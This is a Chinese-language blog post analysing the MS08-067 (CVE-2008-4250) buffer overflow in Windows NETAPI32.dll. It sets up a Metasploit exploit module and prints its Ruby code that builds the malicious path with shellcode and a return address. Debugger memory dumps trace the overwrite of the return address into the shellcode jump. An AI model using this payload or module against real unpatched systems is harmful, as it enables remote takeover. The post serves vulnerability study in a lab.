【Windows Exploit】CVE-2008-4250漏洞分析
影响版本:Windows 2000、Windows XP、Windows Server 2003、Windows Vista 和 Windows Server 2008
笔者测试版本 Windows XP Professional SP1
漏洞描述:NETAPI32.dll模块的NetpwPathCanonicalize函数存在缓冲区溢出,通过构造恶意路径覆盖msvcrt.wcscpy函数返回值,从而获取系统控制权。对于 Windows 2000、XP 和 Server 2003,攻击者无需认证即可利用此漏洞,而对于 Windows Vista 和 Server 2008,可能需要进行认证。
补丁:参考https://learn.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067
1. 🛠️准备环境
- Kali Linux
- Windows XP Professional SP1
- VSCode(安装扩展 Ruby, Ruby LSP, Ruby Sorbet, VSCode rdbg Ruby Debugger)
- OllyICE 或 OllyDBG
1-1. 配置ruby开发环境
# 安装配置rbenv
git clone https://github.com/rbenv/rbenv.git ~/.rbenv
git clone https://github.com/rbenv/ruby-build.git ~/.rbenv/plugins/ruby-build
git clone https://github.com/jamis/rbenv-gemset.git ~/.rbenv/plugins/rbenv-gemset
git clone https://github.com/rkh/rbenv-update.git ~/.rbenv/plugins/rbenv-update
git clone https://github.com/AndorChen/rbenv-china-mirror.git ~/.rbenv/plugins/rbenv-china-mirror
# 添加到~/.zshrc 或 ~/.bashrc 或 ~/.bash_profile
export PATH="$HOME/.rbenv/bin:$PATH"
eval "$(rbenv init -)"
export RUBY_BUILD_MIRROR_URL=https://cache.ruby-china.com
# 配置清华镜像
gem sources --add https://mirrors.tuna.tsinghua.edu.cn/rubygems/ --remove https://rubygems.org/
gem sources -l
bundle config mirror.https://rubygems.org https://mirrors.tuna.tsinghua.edu.cn/rubygems
1-2. 配置metasploit-framework开发环境
# 下载 metasploit-framework
cd ~ && git clone https://github.com/BinRacer/metasploit-framework.git
cd metasploit-framework
# 安装 ruby
rbenv install $(cat .ruby-version)
rbenv local $(cat .ruby-version)
# 安装依赖项
gem install
gem install bundler
bundle install
# 添加 vscode 调试配置文件
mkdir .vscode && touch .vscode/launch.json
cat > .vscode/launch.json <<EOF
{
// 使用 IntelliSense 了解相关属性。
// 悬停以查看现有属性的描述。
// 欲了解更多信息,请访问: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"type": "rdbg",
"name": "Debug ms08_067_netapi",
"request": "launch",
"script": "${workspaceRoot}/msfconsole",
"args": [
"-r",
"${workspaceRoot}/modules/exploits/windows/smb/ms08_067_netapi_debug.rc"
],
"askParameters": false,
"useBundler": true,
"useTerminal": true,
},
{
"type": "rdbg",
"name": "Attach with rdbg",
"request": "attach"
}
]
}
EOF
1-3. 准备exploit脚本
# 下载 ms08-067
cd ~ && git clone https://github.com/BinRacer/ms08-067.git
# 替换 rc 文件内 x.x.x.x 为实际 IP 地址
sudo cp -a ~/ms08-067/src/ms08_067_netapi_sp1.rb ~/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi_sp1.rb
sudo cp -a ~/ms08-067/src/ms08_067.rc ~/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi_debug.rc
2. 🛠️开始调试
2-1. 查询目标服务进程号
以管理员身份打开cmd窗口,查询目标服务进程号。
# 目标进程为 svchost.exe -k netsvcs
C:\Documents and Settings\bogon>wmic process where caption="svchost.exe" get processid,commandline
CommandLine ProcessId
C:\WINDOWS\system32\svchost -k rpcss 880
C:\WINDOWS\System32\svchost.exe -k netsvcs 980
C:\WINDOWS\System32\svchost.exe -k NetworkService 1148
C:\WINDOWS\System32\svchost.exe -k LocalService 1180
C:\Documents and Settings\bogon>
2-2. 寻找目标服务进程
选择 OllyICE 并右键以管理员身份运行。进入 OllyICE 主界面,打开 文件》附加》,选择调试目标进程,按照名称排序。
2-2. 选择目标服务
待加载完,选择 查看》可执行模块,按路径排序,双击 NETAPI32.dll
2-3. 查找目标模块
进入 CPU 主界面,右键选择 查找》当前模块中的名称(标签)
2-4. 设置断点
在 NETAPI32.dll 模块中查找 NetpwPathCanonicalize 函数,F2 设置断点
双击 NetpwPathCanonicalize 函数进入 CPU 界面,定位 71BA2BB1 E8 1B000000 call 71BA2BD1 并设置断点
跟随 71BA2BD1 ,定位 71BA2C54 E8 3B000000 call 71BA2C94 设置断点
转到 0x71badfec 地址,设置断点。msvcrt.wcscpy 这个函数是 漏洞 触发的关键,这个断点会触发两次。 第二次将恶意路径溢出缓冲区,覆盖 msvcrt.wcscpy ret 返回值,从而获取控制权。
F9 运行程序。
2-5. 构造payload
使用 VSCode 打开配置 metasploit-framework, 👉ms08_067_netapi_sp1.rb 文件,恶意路径如下:
#
# Build the malicious path name
#
prefix = '\\'
path = ''
server = Rex::Text.rand_text_alpha(rand(8) + 1).upcase
path =
Rex::Text.to_unicode('\\') +
# This buffer is removed from the front
'B' * 100 +
# search the start of shellcode
'S' * 16 +
# Shellcode
payload.encoded +
# search the end of shellcode
'E' * 16 +
# Relative path to trigger the bug
Rex::Text.to_unicode('\\..\\..\\') +
# Extra padding
Rex::Text.to_unicode('A' * 7) +
# Writable memory location (static)
'P' * 4 + # EBP
# Return to embedded jump
[target.ret].pack('V') + # ret addr
# Padding with embedded jump
'D' * 50 +
# eb 72 = jmp short shellcode = 当前指令地址 + offset 0x72 + 0x2(跳转本身长度)
"\xeb\x72" +
# Padding
'D' * 18 +
# NULL termination
"\x00" * 2
2-6. 发送payload
配置完调试环境之后,触发调试。这时会往目标机器发送恶意请求。
OllyICE 命中断点
F9 运行至 bug function 断点处
可以观察到 恶意路径信息与 ruby 文件一致
011CF4B4 5C 00 42 42 42 42 42 42 42 42 42 42 42 42 42 42 \.BBBBBBBBBBBBBB
011CF4C4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4D4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4E4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4F4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF504 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF514 42 42 42 42 42 42 53 53 53 53 53 53 53 53 53 53 BBBBBBSSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
F9 运行至 0x71badfec 断点处,此时是第一次命中 msvcrt.wcscpy
011CF4B4 5C 00 42 42 42 42 42 42 42 42 42 42 42 42 42 42 \.BBBBBBBBBBBBBB
011CF4C4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4D4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4E4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF4F4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF504 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
011CF514 42 42 42 42 42 42 53 53 53 53 53 53 53 53 53 53 BBBBBBSSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
011CF484 011CF4B4 |dest = 011CF4B4
011CF488 011CF6D8 \src = "\..\AAAAAAA",82,"?,82,"?",A8,"",A1,"?????????????????????????狫?????????"
011CF48C 77C13EBC msvcrt.wcslen
011CF490 00000001
011CF494 77C13D88 msvcrt.wcscat
011CF498 011CF6D2 UNICODE "\..\..\AAAAAAA"
011CF49C /011CF8C8
011CF4A0 |71BA2C59 返回到 NETAPI32.71BA2C59 来自 NETAPI32.71BA2C94
011CF4A4 |011CF4B4
011CF4A8 |00000000
011CF4AC |000AB5E0
011CF4B0 |0011CFAC
011CF4B4 |4242005C
011CF4B8 |42424242
...
011CF510 |42424242
011CF514 |42424242
011CF518 |53534242
011CF51C |53535353
011CF520 |53535353
011CF524 |53535353
011CF528 |914B5353
011CF52C |48974A4E
...
011CF56C |CC8538FF
011CF570 |776C41B9 shell32.776C41B9
...
011CF5A0 |88F74418
011CF5A4 |77DA4239 ADVAPI32.77DA4239
011CF5A8 |D7B3D26A
...
011CF6CC |45454545
011CF6D0 |005C4545 SHLWAPI.005C4545
011CF6D4 |002E002E
011CF6D8 |002E005C
F8 单步步过 msvcrt.wcscpy 函数
011CF4B4 5C 00 2E 00 2E 00 5C 00 41 00 41 00 41 00 41 00 \.....\.A.A.A.A.
011CF4C4 41 00 41 00 41 00 50 50 50 50 61 13 00 01 44 44 A.A.A.PPPPa.DD
011CF4D4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4E4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4F4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF504 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 44 44 雛DDDDDDDDDDDDDD
011CF514 44 44 44 44 00 00 53 53 53 53 53 53 53 53 53 53 DDDD..SSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
011CF484 011CF4B4 UNICODE "\..\AAAAAAA"
011CF488 011CF6D8 UNICODE "\..\AAAAAAA"
011CF48C 77C13EBC msvcrt.wcslen
011CF490 00000001
011CF494 77C13D88 msvcrt.wcscat
011CF498 011CF6D2 UNICODE "\..\..\AAAAAAA"
011CF49C /011CF8C8
011CF4A0 |71BA2C59 返回到 NETAPI32.71BA2C59 来自 NETAPI32.71BA2C94
011CF4A4 |011CF4B4 UNICODE "\..\AAAAAAA"
011CF4A8 |00000000
011CF4AC |000AB5E0
011CF4B0 |0011CFAC
011CF4B4 |002E005C
011CF4B8 |005C002E SHLWAPI.005C002E
011CF4BC |00410041
011CF4C0 |00410041
011CF4C4 |00410041
011CF4C8 |50500041
011CF4CC |13615050
011CF4D0 |44440100
011CF4D4 |44444444
...
011CF4FC |44444444
011CF500 |44444444
011CF504 |444472EB
011CF508 |44444444
011CF50C |44444444
011CF510 |44444444
011CF514 |44444444
011CF518 |53530000
011CF51C |53535353
011CF520 |53535353
011CF524 |53535353
011CF528 |914B5353
011CF52C |48974A4E
...
011CF568 |FFFFD8E8
011CF56C |CC8538FF
011CF570 |776C41B9 shell32.776C41B9
...
011CF5A0 |88F74418
011CF5A4 |77DA4239 ADVAPI32.77DA4239
011CF5A8 |D7B3D26A
...
011CF6BC |50C7D638
011CF6C0 |45454E72
011CF6C4 |45454545
011CF6C8 |45454545
011CF6CC |45454545
011CF6D0 |005C4545 SHLWAPI.005C4545
011CF6D4 |002E002E
011CF6D8 |002E005C
F9 再次运行至 0x71badfec 断点处,此时是第二次命中 msvcrt.wcscpy
011CF4B4 5C 00 2E 00 2E 00 5C 00 41 00 41 00 41 00 41 00 \.....\.A.A.A.A.
011CF4C4 41 00 41 00 41 00 50 50 50 50 61 13 00 01 44 44 A.A.A.PPPPa.DD
011CF4D4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4E4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4F4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF504 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 44 44 雛DDDDDDDDDDDDDD
011CF514 44 44 44 44 00 00 53 53 53 53 53 53 53 53 53 53 DDDD..SSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
011CF46C 005E005C ASCII "????????????"
011CF470 011CF6E0
011CF474 011CF488
011CF478 77F53E8F ntdll.77F53E8F
011CF47C 011CF480
011CF480 71BADFF2 NETAPI32.71BADFF2
011CF484 011CF46C |dest = 011CF46C
011CF488 011CF4BA \src = "\AAAAAAA",82,"?,82,"?",A8,"",A1,"?????????????????????????狫?????????"
011CF48C 77C13EBC msvcrt.wcslen
011CF490 00000001
011CF494 77C13D88 msvcrt.wcscat
011CF498 011CF4B4 UNICODE "\..\AAAAAAA"
011CF49C /011CF8C8
011CF4A0 |71BA2C59 返回到 NETAPI32.71BA2C59 来自 NETAPI32.71BA2C94
011CF4A4 |011CF4B4 UNICODE "\..\AAAAAAA"
011CF4A8 |00000000
011CF4AC |000AB5E0
011CF4B0 |0011CFAC
011CF4B4 |002E005C
011CF4B8 |005C002E SHLWAPI.005C002E
011CF4BC |00410041
011CF484 011CF46C
011CF46C 5C 00 5E 00 E0 F6 1C 01 88 F4 1C 01 8F 3E F5 77 \.^.圉
堲
?鮳
011CF47C 80 F4 1C 01 F2 DF BA 71 6C F4 1C 01 BA F4 1C 01 €?蜻簈l?呼
011CF48C BC 3E C1 77 01 00 00 00 88 3D C1 77 B4 F4 1C 01 ?羨...?羨呆
011CF49C C8 F8 1C 01 59 2C BA 71 B4 F4 1C 01 00 00 00 00 萨
Y,簈呆
....
011CF4AC E0 B5 0A 00 AC CF 11 00 5C 00 2E 00 2E 00 5C 00 嗟...\.....\.
011CF4BC 41 00 41 00 41 00 41 00 41 00 41 00 41 00 50 50 A.A.A.A.A.A.A.PP
011CF4CC 50 50 61 13 00 01 44 44 44 44 44 44 44 44 44 44 PPa.DDDDDDDDDD
011CF488 011CF4BA
011CF4BA 5C 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 \.A.A.A.A.A.A.A.
011CF4CA 50 50 50 50 61 13 00 01 44 44 44 44 44 44 44 44 PPPPa.DDDDDDDD
011CF4DA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4EA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4FA 44 44 44 44 44 44 44 44 44 44 EB 72 44 44 44 44 DDDDDDDDDD雛DDDD
011CF50A 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 DDDDDDDDDDDDDD..
F7 单步步入第二次的 msvcrt.wcscpy 函数, 在 77C13DCD C3 retn 设置断点。 F9 运行至 77C13DCD 断点
ESI 011CF4B6
011CF4B6 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 44 44 雛DDDDDDDDDDDDDD
011CF4C6 44 44 44 44 00 00 50 50 61 13 00 01 44 44 44 44 DDDD..PPa.DDDD
011CF4D6 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4E6 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4F6 44 44 44 44 44 44 44 44 44 44 44 44 44 44 EB 72 DDDDDDDDDDDDDD雛
011CF506 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF516 44 44 00 00 53 53 53 53 53 53 53 53 53 53 53 53 DD..SSSSSSSSSSSS
011CF526 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 96 90 SSSSK慛J桯鴻態枑
011CF536 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 23 5B C鴸鵊麵怓C麭F?[
...
011CF6A6 50 23 AD 38 A5 7A ED B9 3E F9 32 05 C3 65 4D 80 P#?砉>?胑M€
011CF6B6 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 45 45 兟+鱓?智PrNEEEE
011CF6C6 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 2E 00 EEEEEEEEEEEE\...
011CF464 B4 F4 1C 01 88 3D C1 77 5C 00 41 00 41 00 41 00 呆
?羨\.A.A.A.
011CF474 41 00 41 00 41 00 41 00 50 50 50 50 61 13 00 01 A.A.A.A.PPPPa.
011CF484 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF494 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4A4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4B4 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 DD雛DDDDDDDDDDDD
011CF4C4 44 44 44 44 44 44 00 00 50 50 61 13 00 01 44 44 DDDDDD..PPa.DD
011CF4D4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4E4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4F4 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF504 EB 72 44 44 44 44 44 44 44 44 44 44 44 44 44 44 雛DDDDDDDDDDDDDD
011CF514 44 44 44 44 00 00 53 53 53 53 53 53 53 53 53 53 DDDD..SSSSSSSSSS
011CF524 53 53 53 53 53 53 4B 91 4E 4A 97 48 F8 99 91 42 SSSSSSK慛J桯鴻態
011CF534 96 90 43 F8 96 F9 47 FC 49 90 46 43 FC 42 46 EB 枑C鴸鵊麵怓C麭F
...
011CF6B4 4D 80 83 C2 2B F7 57 EF 38 D6 C7 50 72 4E 45 45 M€兟+鱓?智PrNEE
011CF6C4 45 45 45 45 45 45 45 45 45 45 45 45 45 45 5C 00 EEEEEEEEEEEEEE\.
011CF6D4 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 41 00 41 00 ....\.....\.A.A.
011CF6E4 41 00 41 00 41 00 41 00 41 00 50 50 50 50 61 13 A.A.A.A.A.PPPPa
011CF6F4 00 01 44 44 44 44 44 44 44 44 44 44 44 44 44 44 .DDDDDDDDDDDDDD
011CF704 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF714 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF724 44 44 44 44 EB 72 44 44 44 44 44 44 44 44 44 44 DDDD雛DDDDDDDDDD
011CF734 44 44 44 44 44 44 44 44 00 00 DDDDDDDD..
011CF484 011CF46C
011CF46C 5C 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 \.A.A.A.A.A.A.A.
011CF47C 50 50 50 50 61 13 00 01 44 44 44 44 44 44 44 44 PPPPa.DDDDDDDD
011CF48C 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF49C 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4AC 44 44 44 44 44 44 44 44 44 44 EB 72 44 44 44 44 DDDDDDDDDD雛DDDD
011CF4BC 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 DDDDDDDDDDDDDD..
011CF4CC 50 50 61 13 00 01 44 44 44 44 44 44 44 44 44 44 PPa.DDDDDDDDDD
011CF488 011CF4BA
011CF4BA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4CA 00 00 50 50 61 13 00 01 44 44 44 44 44 44 44 44 ..PPa.DDDDDDDD
011CF4DA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4EA 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
011CF4FA 44 44 44 44 44 44 44 44 44 44 EB 72 44 44 44 44 DDDDDDDDDD雛DDDD
011CF50A 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 DDDDDDDDDDDDDD..
F7 运行至 011CF4B6,刚好跳转至 shellcode 处
参考
https://learn.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067
https://github.com/BinRacer/ms08-067.git
文档信息
- 本文作者:BinRacer
- 本文链接:https://BinRacer.github.io/2025/09/08/CVE-2008-4250/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)